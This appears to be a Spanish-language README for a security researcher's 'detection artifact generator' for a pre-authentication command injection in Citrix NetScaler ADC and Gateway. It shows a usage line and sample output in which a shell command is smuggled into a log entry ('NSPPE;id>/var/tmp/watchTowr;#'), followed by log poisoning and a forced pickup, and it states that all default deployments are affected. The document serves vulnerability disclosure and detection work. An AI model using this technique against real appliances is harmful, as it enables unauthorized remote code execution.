
Generador de artefactos de detección para Citrix NetScaler CVE-2026-88771, que explota una inyección de comandos previa a la autenticación para lograr la ejecución remota de código contra implementaciones de ADC y Gateway.
Generador de artefactos de detección para Citrix NetScaler CVE-2026-88771
Consulta nuestra publicación en el blog para obtener detalles técnicos.
./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py
(*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-88771]
[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done
puede tardar hasta 24 horas en que el comando sea recogido Además, la técnica de recogida forzada no está incluida
Todas las implementaciones de NetScaler ADC y NetScaler Gateway (configuración predeterminada / no se requiere ninguna característica adicional)
Consulta el aviso oficial de Citrix para obtener una lista de las versiones afectadas.
Para conocer las últimas investigaciones de seguridad, sigue al equipo de watchTowr Labs